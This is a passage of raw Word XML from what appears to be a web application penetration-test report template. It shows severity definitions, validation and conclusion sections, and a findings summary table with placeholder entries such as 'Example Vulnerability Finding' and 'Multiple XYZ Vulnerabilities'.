              <w:t>Moderate vulnerabilities that could be exploited in conjunction with other vulnerabilities or may pose a business risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="4811F575" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="0E66CFEC" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19435B4A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Minor issues that have minimal impact on security but may still be exploitable in specific circumstances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74025F98" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="09D76692">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A3F1C" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="false-positives-and-validation"/>
      <w:bookmarkStart w:id="85" w:name="_Toc178498985"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>False Positives and Validation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="7BF3D66E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Each vulnerability discovered was manually validated to confirm its existence and potential impact. Any vulnerabilities flagged by automated tools as false positives were carefully analyzed and excluded from the report to ensure the findings are both relevant and actionable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5476422E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="2786AF7B">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5C13E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="conclusion"/>
      <w:bookmarkStart w:id="87" w:name="_Toc178498986"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="3E633BE5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The methodology employed for this assessment ensures that the web application has been thoroughly evaluated for security vulnerabilities. By combining manual and automated testing techniques, leveraging industry-standard tools, and following strict guidelines, we provided a comprehensive analysis of potential threats. Remediation recommendations are provided to address critical vulnerabilities and improve the overall security posture of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD87E5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00871A44" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="7506BD40">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="88" w:name="methodology-1"/>
      <w:bookmarkStart w:id="89" w:name="overview-1"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="3C5355E0" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:bookmarkStart w:id="90" w:name="false-positives-and-validation-1"/>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="64124B9D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="conclusion-1"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkEnd w:id="91"/>
    <w:p w14:paraId="4831E8E4" w14:textId="50C5DDED" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC05A4E" w14:textId="2CB2FB32" w:rsidR="00475B86" w:rsidRPr="00037BB4" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc177321915"/>
      <w:bookmarkStart w:id="93" w:name="_Toc178498987"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ASSESSMENT FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="96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3795"/>
        <w:gridCol w:w="1635"/>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="1275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00475B86" w14:paraId="0B7D110F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17553642"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Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B0F463D"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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="540657D8"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Risk Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1264D077"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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="409E1449"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Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="7B6B34C9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58042C70" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3329A32C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Example Vulnerability Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F65AAB2" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A525517" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="239738CF" w14:textId="03064020" w:rsidR="00475B86" w:rsidRDefault="00A64A83">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="79C9E375" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AD5102F" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3ADABD02" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Firewall Rule Set Not Best Practice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7491B8B6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="156806CC" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="52D96A25" w14:textId="4FDA58E4" w:rsidR="00475B86" w:rsidRDefault="00A64A83">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="265BADC5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="468"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5127ED6C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03CC340F" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Outdated Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BF5E589" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33739A8D" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74FCEEA2" w14:textId="7BCC9089" w:rsidR="00475B86" w:rsidRDefault="00A64A83">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="08870203" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26262E38" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21C7D10B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Multiple XYZ Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="09AB5D67" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E2AFA0F" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21C7C96C" w14:textId="6A972886" w:rsidR="00475B86" w:rsidRDefault="00A64A83">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="484ABEF9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
